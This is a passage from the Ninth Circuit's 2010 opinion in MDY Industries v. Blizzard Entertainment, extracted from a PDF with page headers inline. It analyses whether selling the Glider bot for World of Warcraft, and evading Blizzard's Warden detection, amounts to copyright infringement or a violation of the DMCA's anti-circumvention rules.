DGC
v.
MICHAEL DONNELLY,
Third-party-defendant-Appellant.
MDY INDUSTRIES, LLC,
Plaintiff-counter-defendant-
Appellee,
v.
No. 09-16044
BLIZZARD ENTERTAINMENT, INC. and
D.C. No.
VIVENDI GAMES, INC.,
2:06-CV-02555-
Defendants-third-party-plaintiffs-
DGC
Appellants,
OPINION
v.
MICHAEL DONNELLY,
Third-party-defendant-Appellee.
Appeal from the United States District Court
for the District of Arizona
David G. Campbell, District Judge, Presiding
19979
Case: 09-16044 12/14/2010 Page: 1 of 47 ID: 7579806 DktEntry: 54-1
Argued and Submitted
June 7, 2010—Seattle, Washington
Filed December 14, 2010
Before: William C. Canby, Jr., Consuelo M. Callahan and
Sandra S. Ikuta, Circuit Judges.
Opinion by Judge Callahan
19980
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 2 of 47 ID: 7579806 DktEntry: 54-1
COUNSEL
Lance C. Venable (argued) and Joseph R. Meaney of Ven-
able, Campillo, Logan & Meaney, P.C., for plaintiff-
19984
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 3 of 47 ID: 7579806 DktEntry: 54-1
appellant/cross-appellee MDY Industries LLC and plaintiff-
appellant/third-party-defendant-appellee Michael Donnelly.
Christian S. Genetski (argued), Shane M. McGee, and Jacob
A. Sommer of Sonnenschein Nath & Rosenthal LLP, for
defendants-appellees/cross-appellants Blizzard Entertainment,
Inc. and Vivendi Games, Inc.
George A. Riley, David R. Eberhart, and David S. Almeling
of O’Melveny & Myers LLP, for amicus curiae Business
Software Alliance.
Scott E. Bain, Keith Kupferschmid, and Mark Bohannon, for
amicus curiae Software & Information Industry Association.
Brian W. Carver of the University of California, Berkeley,
School of Information, and Sherwin Siy and Jef Pearlman, for
amicus curiae Public Knowledge.
Robert H. Rotstein, Steven J. Metalitz, and J. Matthew Wil-
liams of Mitchell Silberberg & Knupp LLP, for amicus curiae
Motion Picture Association of America, Inc.
OPINION
CALLAHAN, Circuit Judge:
Blizzard Entertainment, Inc. (“Blizzard”) is the creator of
World of Warcraft (“WoW”), a popular multiplayer online
role-playing game in which players interact in a virtual world
while advancing through the game’s 70 levels. MDY Indus-
tries, LLC and its sole member Michael Donnelly
(“Donnelly”) (sometimes referred to collectively as “MDY”)
developed and sold Glider, a software program that automati-
cally plays the early levels of WoW for players.
19985
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 4 of 47 ID: 7579806 DktEntry: 54-1
MDY brought this action for a declaratory judgment to
establish that its Glider sales do not infringe Blizzard’s copy-
right or other rights, and Blizzard asserted counterclaims
under the Digital Millennium Copyright Act (“DMCA”), 17
U.S.C. § 1201 et seq., and for tortious interference with con-
tract under Arizona law. The district court found MDY and
Donnelly liable for secondary copyright infringement, viola-
tions of DMCA §§ 1201(a)(2) and (b)(1), and tortious inter-
ference with contract. We reverse the district court except as
to MDY’s liability for violation of DMCA § 1201(a)(2) and
remand for trial on Blizzard’s claim for tortious interference
with contract.
I.
A. World of Warcraft
In November 2004, Blizzard created WoW, a “massively
multiplayer online role-playing game” in which players inter-
act in a virtual world. WoW has ten million subscribers, of
which two and a half million are in North America. The WoW
software has two components: (1) the game client software
that a player installs on the computer; and (2) the game server
software, which the player accesses on a subscription basis by
connecting to WoW’s online servers. WoW does not have
single-player or offline modes.
WoW players roleplay different characters, such as
humans, elves, and dwarves. A player’s central objective is to
advance the character through the game’s 70 levels by partici-
pating in quests and engaging in battles with monsters. As a
player advances, the character collects rewards such as in-
game currency, weapons, and armor. WoW’s virtual world
has its own economy, in which characters use their virtual
currency to buy and sell items directly from each other,
through vendors, or using auction houses. Some players also
utilize WoW’s chat capabilities to interact with others.
19986
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 5 of 47 ID: 7579806 DktEntry: 54-1
B. Blizzard’s use agreements
Each WoW player must read and accept Blizzard’s End
User License Agreement (“EULA”) and Terms of Use
(“ToU”) on multiple occasions. The EULA pertains to the
game client, so a player agrees to it both before installing the
game client and upon first running it. The ToU pertains to the
online service, so a player agrees to it both when creating an
account and upon first connecting to the online service. Play-
ers who do not accept both the EULA and the ToU may return
the game client for a refund.
C. Development of Glider and Warden
Donnelly is a WoW player and software programmer. In
March 2005, he developed Glider, a software “bot” (short for
robot) that automates play of WoW’s early levels, for his per-
sonal use. A user need not be at the computer while Glider is
running. As explained in the Frequently Asked Questions
(“FAQ”) on MDY’s website for Glider:
Glider . . . moves the mouse around and pushes keys
on the keyboard. You tell it about your character,
where you want to kill things, and when you want to
kill. Then it kills for you, automatically. You can do
something else, like eat dinner or go to a movie, and
when you return, you’ll have a lot more experience
and loot.
Glider does not alter or copy WoW’s game client software,
does not allow a player to avoid paying monthly subscription
dues to Blizzard, and has no commercial use independent of
WoW. Glider was not initially designed to avoid detection by
Blizzard.
The parties dispute Glider’s impact on the WoW experi-
ence. Blizzard contends that Glider disrupts WoW’s environ-
ment for non-Glider players by enabling Glider users to
19987
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 6 of 47 ID: 7579806 DktEntry: 54-1
advance quickly and unfairly through the game and to amass
additional game assets. MDY contends that Glider has a mini-
mal effect on non-Glider players, enhances the WoW experi-
ence for Glider users, and facilitates disabled players’ access
to WoW by auto-playing the game for them.
In summer 2005, Donnelly began selling Glider through
MDY’s website for fifteen to twenty-five dollars per license.
Prior to marketing Glider, Donnelly reviewed Blizzard’s
EULA and client-server manipulation policy. He reached the
conclusion that Blizzard had not prohibited bots in those doc-
uments.
In September 2005, Blizzard launched Warden, a technol-
ogy that it developed to prevent its players who use unautho-
rized third-party software, including bots, from connecting to
WoW’s servers. Warden was able to detect Glider, and Bliz-
zard immediately used Warden to ban most Glider users.
MDY responded by modifying Glider to avoid detection and
promoting its new anti-detection features on its website’s
FAQ. It added a subscription service, Glider Elite, which
offered “additional protection from game detection software”
for five dollars a month.
Thus, by late 2005, MDY was aware that Blizzard was pro-
hibiting bots. MDY modified its website to indicate that using
Glider violated Blizzard’s ToU. In November 2005, Donnelly
wrote in an email interview, “Avoiding detection is rather
exciting, to be sure. Since Blizzard does not want bots run-
ning at all, it’s a violation to use them.” Following MDY’s
anti-detection modifications, Warden only occasionally
detected Glider. As of September 2008, MDY had gross reve-
nues of $3.5 million based on 120,000 Glider license sales.
D. Financial and practical impact of Glider
Blizzard claims that from December 2004 to March 2008,
it received 465,000 complaints about WoW bots, several
19988
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 7 of 47 ID: 7579806 DktEntry: 54-1
thousand of which named Glider. Blizzard spends $940,000
annually to respond to these complaints, and the parties have
stipulated that Glider is the principal bot used by WoW play-
ers. Blizzard introduced evidence that it may have lost
monthly subscription fees from Glider users, who were able
to reach WoW’s highest levels in fewer weeks than players
playing manually. Donnelly acknowledged in a November
2005 email that MDY’s business strategy was to make Bliz-
zard’s anti-bot detection attempts financially prohibitive:
The trick here is that Blizzard has a finite amount of
development and test resources, so we want to make
it bad business to spend that much time altering their
detection code to find Glider, since Glider’s negative
effect on the game is debatable . . . . [W]e attack
th[is] weakness and try to make it a bad idea or make
their changes very risky, since they don’t want to
risk banning or crashing innocent customers.
E. Pre-litigation contact between MDY and Blizzard
In August 2006, Blizzard sent MDY a cease-and-desist let-
ter alleging that MDY’s website hosted WoW screenshots and
a Glider install file, all of which infringed Blizzard’s copy-
rights. Donnelly removed the screenshots and requested Bliz-
zard to clarify why the install file was infringing, but Blizzard
did not respond. In October 2006, Blizzard’s counsel visited
Donnelly’s home, threatening suit unless MDY immediately
ceased selling Glider and remitted all profits to Blizzard.
MDY immediately commenced this action.
II.
On December 1, 2006, MDY filed an amended complaint
seeking a declaration that Glider does not infringe Blizzard’s
copyright or other rights. In February 2007, Blizzard filed
counterclaims and third-party claims against MDY and Don-
nelly for, inter alia, contributory and vicarious copyright
19989
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 8 of 47 ID: 7579806 DktEntry: 54-1
infringement, violation of DMCA §§ 1201(a)(2) and (b)(1),
and tortious interference with contract.
In July 2008, the district court granted Blizzard partial sum-
mary judgment, finding that MDY’s Glider sales contribu-
torily and vicariously infringed Blizzard’s copyrights and
tortiously interfered with Blizzard’s contracts. The district
court also granted MDY partial summary judgment, finding
that MDY did not violate DMCA § 1201(a)(2) with respect to
accessing the game software’s source code.
In September 2008, the parties stipulated to entry of a $6
million judgment against MDY for the copyright infringement
and tortious interference with contract claims. They further
stipulated that Donnelly would be personally liable for the
same amount if found personally liable at trial. After a Janu-
ary 2009 bench trial, the district court held MDY liable under
DMCA §§ 1201(a)(2) and (b)(1). It also held Donnelly per-
sonally liable for MDY’s copyright infringement, DMCA vio-
lations, and tortious interference with contract.
On April 1, 2009, the district court entered judgment
against MDY and Donnelly for $6.5 million, an adjusted fig-
ure to which the parties stipulated based on MDY’s DMCA
liability and post-summary judgment Glider sales. The district
court permanently enjoined MDY from distributing Glider.
MDY’s efforts to stay injunctive relief pending appeal were
unsuccessful. On April 29, 2009, MDY timely filed this
appeal. On May 12, 2009, Blizzard timely cross-appealed the
district court’s holding that MDY did not violate DMCA
§§ 1201(a)(2) and (b)(1) as to the game software’s source
code.
III.
We review de novo the district court’s (1) orders granting
or denying summary judgment; (2) conclusions of law after a
bench trial; and (3) interpretations of state law. Padfield v.
19990
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 9 of 47 ID: 7579806 DktEntry: 54-1
AIG Life Ins., 290 F.3d 1121, 1124 (9th Cir. 2002); Twentieth
Century Fox Film Corp. v. Entm’t Distrib., 429 F.3d 869, 879
(9th Cir. 2005); Laws v. Sony Music Entm’t, Inc., 448 F.3d
1134, 1137 (9th Cir. 2006). We review the district court’s
findings of fact for clear error. Twentieth Century Fox, 429
F.3d at 879.
IV.
[1] We first consider whether MDY committed contribu-
tory or vicarious infringement (collectively, “secondary
infringement”) of Blizzard’s copyright by selling Glider to
WoW players.
1 See ProCD, Inc. v. Zeidenberg, 86 F.3d 1447,
1454 (7th Cir. 1996) (“A copyright is a right against the
world. Contracts, by contrast, generally affect only their par-
ties.”). To establish secondary infringement, Blizzard must
first demonstrate direct infringement. See A&M Records, Inc.
v. Napster, Inc., 239 F.3d 1004, 1019, 1022 (9th Cir. 2001).
To establish direct infringement, Blizzard must demonstrate
copyright ownership and violation of one of its exclusive
rights by Glider users. Id. at 1013. MDY is liable for contribu-
tory infringement if it has “intentionally induc[ed] or
encourag[ed] direct infringement” by Glider users. MGM Stu-
dios Inc. v. Grokster, Ltd., 545 U.S. 913, 930 (2005). MDY
is liable for vicarious infringement if it (1) has the right and
ability to control Glider users’ putatively infringing activity
and (2) derives a direct financial benefit from their activity.
Id. If Glider users directly infringe, MDY does not dispute
that it satisfies the other elements of contributory and vicari-
ous infringement.
[2] As a copyright owner, Blizzard possesses the exclusive
right to reproduce its work. 17 U.S.C. § 106(1). The parties
agree that when playing WoW, a player’s computer creates a
1Alternatively, MDY asks that we determine whether there are any gen-
uine issues of material fact that warrant a remand for trial on Blizzard’s
secondary copyright infringement claims. We find none.
19991
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 10 of 47 ID: 7579806 DktEntry: 54-1
copy of the game’s software in the computer’s random access
memory (“RAM”), a form of temporary memory used by
computers to run software programs. This copy potentially
infringes unless the player (1) is a licensee whose use of the
software is within the scope of the license or (2) owns the
copy of the software. See Sun Microsystems, Inc. v. Microsoft
Corp., 188 F.3d 1115, 1121 (9th Cir. 1999) (“Sun I”); 17
U.S.C. § 117(a). As to the scope of the license, ToU § 4(B),
“Limitations on Your Use of the Service,” provides:
You agree that you will not . . . (ii) create or use
cheats, bots, “mods,” and/or hacks, or any other
third-party software designed to modify the World of
Warcraft experience; or (iii) use any third-party soft-
ware that intercepts, “mines,” or otherwise collects
information from or through the Program or Service.
By contrast, if the player owns the copy of the software, the
“essential step” defense provides that the player does not
infringe by making a copy of the computer program where the
copy is created and used solely “as an essential step in the uti-
lization of the computer program in conjunction with a
machine.” 17 U.S.C. § 117(a)(1).
A. Essential step defense
We consider whether WoW players, including Glider users,
are owners or licensees of their copies of WoW software. If
WoW players own their copies, as MDY contends, then
Glider users do not infringe by reproducing WoW software in
RAM while playing, and MDY is not secondarily liable for
copyright infringement.
[3] In Vernor v. Autodesk, Inc., we recently distinguished
between “owners” and “licensees” of copies for purposes of
the essential step defense. Vernor v. Autodesk, Inc., 621 F.3d
1102, 1108-09 (9th Cir. 2010; see also MAI Sys. Corp. v.
Peak Computer, Inc., 991 F.2d 511, 519 n.5 (9th Cir. 1993);
19992
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 11 of 47 ID: 7579806 DktEntry: 54-1
Triad Sys. Corp. v. Se. Express Co., 64 F.3d 1330, 1333,
1335-36 (9th Cir. 1995); Wall Data, Inc. v. Los Angeles
County Sheriff’s Dep’t, 447 F.3d 769, 784-85 (9th Cir. 2006).
In Vernor, we held “that a software user is a licensee rather
than an owner of a copy where the copyright owner (1) speci-
fies that the user is granted a license; (2) significantly restricts
the user’s ability to transfer the software; and (3) imposes
notable use” restrictions. 621 F.3d at 1111 (internal footnote
omitted).
[4] Applying Vernor, we hold that WoW players are
licensees of WoW’s game client software. Blizzard reserves
title in the software and grants players a non-exclusive, lim-
ited license. Blizzard also imposes transfer restrictions if a
player seeks to transfer the license: the player must (1) trans-
fer all original packaging and documentation; (2) permanently
delete all of the copies and installation of the game client; and
(3) transfer only to a recipient who accepts the EULA. A
player may not sell or give away the account.
[5] Blizzard also imposes a variety of use restrictions. The
game must be used only for non-commercial entertainment
purposes and may not be used in cyber cafes and computer
gaming centers without Blizzard’s permission. Players may
not concurrently use unauthorized third-party programs. Also,
Blizzard may alter the game client itself remotely without a
player’s knowledge or permission, and may terminate the
EULA and ToU if players violate their terms. Termination
ends a player’s license to access and play WoW. Following
termination, players must immediately destroy their copies of
the game and uninstall the game client from their computers,
but need not return the software to Blizzard.
[6] Since WoW players, including Glider users, do not
own their copies of the software, Glider users may not claim
the essential step defense. 17 U.S.C. § 117(a)(1). Thus, when
their computers copy WoW software into RAM, the players
19993
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 12 of 47 ID: 7579806 DktEntry: 54-1
may infringe unless their usage is within the scope of Bliz-
zard’s limited license.
B. Contractual covenants vs. license conditions
[7] “A copyright owner who grants a nonexclusive, limited
license ordinarily waives the right to sue licensees for copy-
right infringement, and it may sue only for breach of con-
tract.” Sun I, 188 F.3d at 1121 (internal quotations omitted).
However, if the licensee acts outside the scope of the license,
the licensor may sue for copyright infringement. Id. (citing
S.O.S., Inc. v. Payday, Inc., 886 F.2d 1081, 1087 (9th Cir.
1989)). Enforcing a copyright license “raises issues that lie at
the intersection of copyright and contract law.” Id. at 1122.
[8] We refer to contractual terms that limit a license’s
scope as “conditions,” the breach of which constitute copy-
right infringement. Id. at 1120. We refer to all other license
terms as “covenants,” the breach of which is actionable only
under contract law. Id. We distinguish between conditions and
covenants according to state contract law, to the extent consis-
tent with federal copyright law and policy. Foad Consulting
Group v. Musil Govan Azzalino, 270 F.3d 821, 827 (9th Cir.
2001).
[9] A Glider user commits copyright infringement by play-
ing WoW while violating a ToU term that is a license condi-
tion. To establish copyright infringement, then, Blizzard must
demonstrate that the violated term — ToU § 4(B) — is a con-
dition rather than a covenant. Sun I, 188 F.3d at 1122. Bliz-
zard’s EULAs and ToUs provide that they are to be
interpreted according to Delaware law. Accordingly, we first
construe them under Delaware law, and then evaluate whether
that construction is consistent with federal copyright law and
policy.
A covenant is a contractual promise, i.e., a manifestation of
intention to act or refrain from acting in a particular way, such
19994
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 13 of 47 ID: 7579806 DktEntry: 54-1
that the promisee is justified in understanding that the promi-
sor has made a commitment. See Travel Centers of Am. LLC
v. Brog, No. 3751-CC, 2008 Del. Ch. LEXIS 183, *9 (Del.
Ch. Dec. 5, 2008); see also Restatement (Second) of Con-
tracts § 2 (1981). A condition precedent is an act or event that
must occur before a duty to perform a promise arises. AES
P.R., L.P. v. Alstom Power, Inc., 429 F. Supp. 2d 713, 717 (D.
Del. 2006) (citing Delaware state law); see also Restatement
(Second) of Contracts § 224. Conditions precedent are disfa-
vored because they tend to work forfeitures. AES, 429 F.
Supp. 2d at 717 (internal citations omitted). Wherever possi-
ble, equity construes ambiguous contract provisions as cove-
nants rather than conditions. See Wilmington Tr. Co. v. Clark,
325 A.2d 383, 386 (Del. Ch. 1974). However, if the contract
is unambiguous, the court construes it according to its terms.
AES, 429 F. Supp. 2d at 717 (citing 17 Am. Jur. 2d Contracts
§ 460 (2006)).
[10] Applying these principles, ToU § 4(B)(ii) and (iii)’s
prohibitions against bots and unauthorized third-party soft-
ware are covenants rather than copyright-enforceable condi-
tions. See Greenwood v. CompuCredit Corp., 615 F.3d 1204,
1212, (9th Cir. 2010) (“[H]eadings and titles are not meant to
take the place of the detailed provisions of the text,” and . . .
“the heading of a section cannot limit the plain meaning of the
text.” (quoting Bhd. of R.R. Trainmen v. Balt. & Ohio R.R.,
331 U.S. 519, 528—29 (1947))). Although ToU § 4 is titled,
“Limitations on Your Use of the Service,” nothing in that sec-
tion conditions Blizzard’s grant of a limited license on play-
ers’ compliance with ToU § 4’s restrictions. To the extent that
the title introduces any ambiguity, under Delaware law, ToU
§ 4(B) is not a condition, but is a contractual covenant. Cf.
Sun Microsystems, Inc. v. Microsoft Corp., 81 F. Supp. 2d
1026, 1031-32 (N.D. Cal. 2000) (“Sun II”) (where Sun
licensed Microsoft to create only derivative works compatible
with other Sun software, Microsoft’s “compatibility obliga-
tions” were covenants because the license was not specifically
conditioned on their fulfillment).
19995
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 14 of 47 ID: 7579806 DktEntry: 54-1
To recover for copyright infringement based on breach of
a license agreement, (1) the copying must exceed the scope of
the defendant’s license and (2) the copyright owner’s com-
plaint must be grounded in an exclusive right of copyright
(e.g., unlawful reproduction or distribution). See Storage
Tech. Corp. v. Custom Hardware Eng’g & Consulting, Inc.,
421 F.3d 1307, 1315-16 (Fed. Cir. 2005). Contractual rights,
however, can be much broader:
[C]onsider a license in which the copyright owner
grants a person the right to make one and only one
copy of a book with the caveat that the licensee may
not read the last ten pages. Obviously, a licensee
who made a hundred copies of the book would be
liable for copyright infringement because the copy-
ing would violate the Copyright Act’s prohibition on
reproduction and would exceed the scope of the
license. Alternatively, if the licensee made a single
copy of the book, but read the last ten pages, the
only cause of action would be for breach of contract,
because reading a book does not violate any right
protected by copyright law.
Id. at 1316. Consistent with this approach, we have held that
the potential for infringement exists only where the licensee’s
action (1) exceeds the license’s scope (2) in a manner that
implicates one of the licensor’s exclusive statutory rights. See,
e.g., Sun I, 118 F.3d at 1121-22 (remanding for infringement
determination where defendant allegedly violated a license
term regulating the creation of derivative works).
2
2See also S.O.S., 886 F.2d at 1089 (remanding for infringement determi-
nation where licensee exceeded the license’s scope by preparing a modi-
fied version of software programs without licensor’s authorization); LGS
Architects, Inc. v. Concordia Homes, Inc., 434 F.3d 1150, 1154-57 (9th
Cir. 2006) (licensor likely to prove infringement where licensee used
architectural plans for project outside the license’s scope, where licensee’s
use may have included unauthorized reproduction, distribution, and public
19996
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 15 of 47 ID: 7579806 DktEntry: 54-1
[11] Here, ToU § 4 contains certain restrictions that are
grounded in Blizzard’s exclusive rights of copyright and other
restrictions that are not. For instance, ToU § 4(D) forbids cre-
ation of derivative works based on WoW without Blizzard’s
consent. A player who violates this prohibition would exceed
the scope of her license and violate one of Blizzard’s exclu-
sive rights under the Copyright Act. In contrast, ToU
§ 4(C)(ii) prohibits a player’s disruption of another player’s
game experience. Id. A player might violate this prohibition
while playing the game by harassing another player with
unsolicited instant messages. Although this conduct may vio-
late the contractual covenants with Blizzard, it would not vio-
late any of Blizzard’s exclusive rights of copyright. The anti-
bot provisions at issue in this case, ToU § 4(B)(ii) and (iii),
are similarly covenants rather than conditions. A Glider user
violates the covenants with Blizzard, but does not thereby
commit copyright infringement because Glider does not
infringe any of Blizzard’s exclusive rights. For instance, the
use does not alter or copy WoW software.
Were we to hold otherwise, Blizzard — or any software
copyright holder — could designate any disfavored conduct
during software use as copyright infringement, by purporting
to condition the license on the player’s abstention from the
disfavored conduct. The rationale would be that because the
conduct occurs while the player’s computer is copying the
software code into RAM in order for it to run, the violation
is copyright infringement. This would allow software copy-
right owners far greater rights than Congress has generally
conferred on copyright owners.
3
display of the plans); Frank Music Corp. v. Metro-Goldwyn-Mayer, Inc.,
772 F.2d 505, 511 (9th Cir. 1985) (hotel infringed copyright by publicly
performing copyrighted music with representations of movie scenes,
where its public performance license expressly prohibited the use of
accompanying visual representations).
3A copyright holder may wish to enforce violations of license agree-
ments as copyright infringements for several reasons. First, breach of con-
19997
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 16 of 47 ID: 7579806 DktEntry: 54-1
[12] We conclude that for a licensee’s violation of a con-
tract to constitute copyright infringement, there must be a
nexus between the condition and the licensor’s exclusive
rights of copyright.
4 Here, WoW players do not commit copy-
right infringement by using Glider in violation of the ToU.
MDY is thus not liable for secondary copyright infringement,
which requires the existence of direct copyright infringement.
Grokster, 545 U.S. at 930.
It follows that because MDY does not infringe Blizzard’s
copyrights, we need not resolve MDY’s contention that Bliz-
zard commits copyright misuse. Copyright misuse is an equi-
table defense to copyright infringement, the contours of which
are still being defined. See Practice Mgmt. Info. Corp. v. Am.
Med. Ass’n, 121 F.3d 516, 520 (9th Cir. 1997). The remedy
for copyright misuse is to deny the copyright holder the right
to enforce its copyright during the period of misuse. Since
MDY does not infringe, we do not consider whether Blizzard
committed copyright misuse.
We thus reverse the district court’s grant of summary judg-
ment to Blizzard on its secondary copyright infringement
tract damages are generally limited to the value of the actual loss caused
by the breach. See 24 Richard A. Lord, Williston on Contracts § 65:1 (4th
ed. 2007). In contrast, copyright damages include the copyright owner’s
actual damages and the infringer’s actual profits, or statutory damages of
up to $150,000 per work. 17 U.S.C. § 504; see Frank Music Corp. v.
MGM, Inc., 772 F.2d 505, 512 n.5 (9th Cir. 1985). Second, copyright law
offers injunctive relief, seizure of infringing articles, and awards of costs
and attorneys’ fees. 17 U.S.C. §§ 502-03, 505. Third, as amicus Software
& Information Industry Association highlights, copyright law allows
copyright owners a remedy against “downstream” infringers with whom
they are not in privity of contract. See ProCD, Inc., 86 F.3d at 1454.
4A licensee arguably may commit copyright infringement by continuing
to use the licensed work while failing to make required payments, even
though a failure to make payments otherwise lacks a nexus to the licen-
sor’s exclusive statutory rights. We view payment as sui generis, however,
because of the distinct nexus between payment and all commercial copy-
right licenses, not just those concerning software.
19998
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 17 of 47 ID: 7579806 DktEntry: 54-1
claims. Accordingly, we must also vacate the portion of the
district court’s permanent injunction that barred MDY and
Donnelly from “infringing, or contributing to the infringement
of, Blizzard’s copyrights in WoW software.”
V.
After MDY began selling Glider, Blizzard launched War-
den, its technology designed to prevent players who used bots
from connecting to the WoW servers. Blizzard used Warden
to ban most Glider users in September 2005. Blizzard claims
that MDY is liable under DMCA §§ 1201(a)(2) and (b)(1)
because it thereafter programmed Glider to avoid detection by
Warden.
A. The Warden technology
Warden has two components. The first is a software mod-
ule called “scan.dll,” which scans a computer’s RAM prior to
allowing the player to connect to WoW’s servers. If scan.dll
detects that a bot is running, such as Glider, it will not allow
the player to connect and play. After Blizzard launched War-
den, MDY reconfigured Glider to circumvent scan.dll by not
loading itself until after scan.dll completed its check. War-
den’s second component is a “resident” component that runs
periodically in the background on a player’s computer when
it is connected to WoW’s servers. It asks the computer to
report portions of the WoW code running in RAM, and it
looks for patterns of code associated with known bots or
cheats. If it detects a bot or cheat, it boots the player from the
game, which halts the computer’s copying of copyrighted
code into RAM.
B. The Digital Millennium Copyright Act
Congress enacted the DMCA in 1998 to conform United
States copyright law to its obligations under two World Intel-
lectual Property Organization (“WIPO”) treaties, which
19999
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 18 of 47 ID: 7579806 DktEntry: 54-1
require contracting parties to provide effective legal remedies
against the circumvention of protective technological mea-
sures used by copyright owners. See Universal City Studios,
Inc. v. Corley, 273 F.3d 429, 440 (2d Cir. 2001). In enacting
the DMCA, Congress sought to mitigate the problems pre-
sented by copyright enforcement in the digital age. Id. The
DMCA contains three provisions directed at the circumven-
tion of copyright owners’ technological measures. The
Supreme Court has yet to construe these provisions, and they
raise questions of first impression in this circuit.
The first provision, 17 U.S.C. § 1201(a)(1)(A), is a general
prohibition against “circumventing a technological measure
that effectively controls access to a work protected under [the
Copyright Act].” The second prohibits trafficking in technol-
ogy that circumvents a technological measure that “effec-
tively controls access” to a copyrighted work. 17 U.S.C.
§ 1201(a)(2). The third prohibits trafficking in technology that
circumvents a technological measure that “effectively pro-
tects” a copyright owner’s right. 17 U.S.C. § 1201(b)(1).
C. The district court’s decision
The district court assessed whether MDY violated DMCA
§§ 1201(a)(2) and (b)(1) with respect to three WoW compo-
nents. First, the district court considered the game client soft-
ware’s literal elements: the source code stored on players’
hard drives. Second, the district court considered the game
client software’s individual non-literal elements: the
400,000+ discrete visual and audible components of the
game, such as a visual image of a monster or its audible roar.
Finally, it considered the game’s dynamic non-literal ele-
ments: that is, the “real-time experience of traveling through
different worlds, hearing their sounds, viewing their struc-
tures, encountering their inhabitants and monsters, and
encountering other players.”
The district court granted MDY partial summary judgment
as to Blizzard’s § 1201(a)(2) claim with respect to WoW’s lit-
20000
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 19 of 47 ID: 7579806 DktEntry: 54-1
eral elements. The district court reasoned that Warden does
not effectively control access to the literal elements because
WoW players can access the literal elements without connect-
ing to a game server and encountering Warden; they need
only install the game client software on their computers. The
district court also ruled for MDY following trial as to Bliz-
zard’s § 1201(a)(2) claim with respect to WoW’s individual
non-literal elements, reasoning that these elements could also
be accessed on a player’s hard drive without encountering
Warden.
The district court, however, ruled for Blizzard following
trial as to its §§ 1201(a)(2) and (b)(1) claims with respect to
WoW’s dynamic non-literal elements, or the “real-time expe-
rience” of playing WoW. It reasoned that Warden effectively
controlled access to these elements, which could not be
accessed without connecting to Blizzard’s servers. It also
found that Glider allowed its users to circumvent Warden by
avoiding or bypassing its detection features, and that MDY
marketed Glider for use in circumventing Warden.
We turn to consider whether Glider violates DMCA
§§ 1201(a)(2) and (b)(1) by allowing users to circumvent
Warden to access WoW’s various elements. MDY contends
that Warden’s scan.dll and resident components are separate,
and only scan.dll should be considered as a potential access
control measure under § 1201(a)(2). However, in our view, an
access control measure can both (1) attempt to block initial
access and (2) revoke access if a secondary check determines
that access was unauthorized. Our analysis considers War-
den’s scan.dll and resident components together because the
two components have the same purpose: to prevent players
using detectable bots from continuing to access WoW soft-
ware.
D. Construction of § 1201
One of the issues raised by this appeal is whether certain
provisions of § 1201 prohibit circumvention of access con-
20001
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 20 of 47 ID: 7579806 DktEntry: 54-1
trols when access does not constitute copyright infringement.
To answer this question and others presented by this appeal,
we address the nature and interrelationship of the various pro-
visions of § 1201 in the overall context of the Copyright Act.
We begin by considering the scope of DMCA § 1201’s
three operative provisions, §§ 1201(a)(1), 1201(a)(2), and
1201(b)(1). We consider them side-by-side, because “[w]e do
not . . . construe statutory phrases in isolation; we read stat-
utes as a whole. Thus, the [term to be construed] must be read
in light of the immediately following phrase . . . .” United
States v. Morton, 467 U.S. 822, 828 (1984); see also Padash
v. I.N.S., 358 F.3d 1161, 1170 (9th Cir. 2004) (we analyze the
statutory provision to be construed “in the context of the gov-
erning statute as a whole, presuming congressional intent to
create a coherent regulatory scheme”).
1. Text of the operative provisions
“We begin, as always, with the text of the statute.” Hawaii
v. Office of Hawaiian Affairs, 129 S. Ct. 1436, 1443 (2009)
(quoting Permanent Mission of India to United Nations v.
City of New York, 551 U.S. 193, 197 (2007)). Section
1201(a)(1)(A) prohibits “circumvent[ing] a technological
measure that effectively controls access to a work protected
under this title.” Sections 1201(a)(2) and (b)(1) provide that
“[n]o person shall manufacture, import, offer to the public,
provide, or otherwise traffic in any technology, product, ser-
vice, device, component, or part thereof, that —
20002
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
Case: 09-16044 12/14/2010 Page: 21 of 47 ID: 7579806 DktEntry: 54-1
(emphasis added).
2. Our harmonization of the DMCA’s operative
provisions
[13] For the reasons set forth below, we believe that
§ 1201 is best understood to create two distinct types of
claims. First, § 1201(a) prohibits the circumvention of any
technological measure that effectively controls access to a
protected work and grants copyright owners the right to
enforce that prohibition. Cf. Corley, 273 F.3d at 441 (“[T]he
focus of subsection 1201(a)(2) is circumvention of technolo-
gies designed to prevent access to a work”). Second, and in
contrast to § 1201(a), § 1201(b)(1) prohibits trafficking in
technologies that circumvent technological measures that
effectively protect “a right of a copyright owner.” Section
1201(b)(1)’s prohibition is thus aimed at circumventions of
20003
MDY INDUSTRIES v. BLIZZARD ENTERTAINMENT
